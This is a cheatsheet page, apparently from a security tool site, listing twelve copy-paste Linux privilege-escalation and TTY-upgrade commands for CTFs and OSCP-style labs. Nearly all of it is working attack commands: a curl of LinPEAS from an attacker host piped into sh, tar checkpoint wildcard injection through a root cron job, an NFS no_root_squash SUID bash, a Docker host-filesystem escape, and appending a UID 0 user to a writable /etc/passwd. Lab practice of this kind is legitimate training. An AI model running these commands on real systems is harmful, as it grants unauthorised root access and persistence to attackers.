ZeroBox

Linux PrivEsc & TTY cheatsheet

12 copy-paste commands for linux privesc & tty in CTFs and OSCP-style labs. Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

TTY Interactive Shell Stabilization (Python + stty)

Upgrade dumb reverse shell to fully interactive pseudo-terminal with tab completion and arrow keys.

python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background shell
stty raw -echo; fg
export TERM=xterm-256color
stty rows 38 columns 140

ttyptyshell-upgradestty

LinPEAS Direct Memory Execution

Download and execute LinPEAS directly in bash memory without writing to disk.

curl -L http://{LHOST}:8000/linpeas.sh | sh

linpeasprivescautomatedcurl

SUID Binaries Exhaustive Discovery

List all binaries on the filesystem with the SUID bit set, ignoring proc and dev.

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

suidprivescfind

Linux Binary Capabilities (`getcap`) Audit

Check binaries granted dangerous capabilities like cap_setuid or cap_dac_read_search.

getcap -r / 2>/dev/null

capabilitiesgetcapprivesc

Sudo Privileges Inspection (`sudo -l`)

Check current user sudo permissions without or with password.

sudo -l

sudoprivescgtfobins

Internal Loopback Services & Listening Ports

Identify services running locally on 127.0.0.1 not exposed on external interfaces.

ss -tulpn | grep LISTEN

portsnetworkinternallocalhost

Crontabs & Scheduled System Jobs

Inspect system-wide crontab files, hourly/daily tasks, and pspy monitored jobs.

cat /etc/crontab /etc/cron.*/* 2>/dev/null; ls -la /var/spool/cron/crontabs/

cronscheduled-tasksprivesc

Tar Wildcard Injection Cronjob Exploit

Abuse tar wildcard in automated root cronjob to execute arbitrary shell commands via checkpoint.

touch /var/backup/--checkpoint=1 && touch "/var/backup/--checkpoint-action=exec=sh root.sh"

tarwildcardcronprivesc

NFS no_root_squash SUID Binary Exploit

Mount vulnerable NFS exported directory locally, compile SUID bash binary, and execute on target.

sudo mount -t nfs {TARGET_IP}:/share /mnt && cp /bin/bash /mnt/rootbash && chmod +s /mnt/rootbash && /mnt/rootbash -p

nfsno-root-squashsuidprivesc

Docker Host Root Filesystem Mount Escape

Spawn privileged docker container mounting host root filesystem to /host.

docker run -v /:/host -it alpine chroot /host /bin/bash

dockerescapecontainerprivesc

pspy Snooping Scheduled System Processes

Monitor running processes without root permissions to discover transient cronjobs and arguments.

./pspy64 -pf -i 1000

pspycronmonitoringprivesc

Writable /etc/passwd New Root User Injection

Generate password hash and append a new user with UID 0 (root) to writable /etc/passwd.

echo "toor:$(openssl passwd -1 -salt evil Password123!):0:0:root:/root:/bin/bash" >> /etc/passwd

passwdrootmisconfigprivesc

Use these commands with your values filled in. ZeroBox interpolates target IP, domain and credentials into every command. Open the cheatsheet

More cheatsheets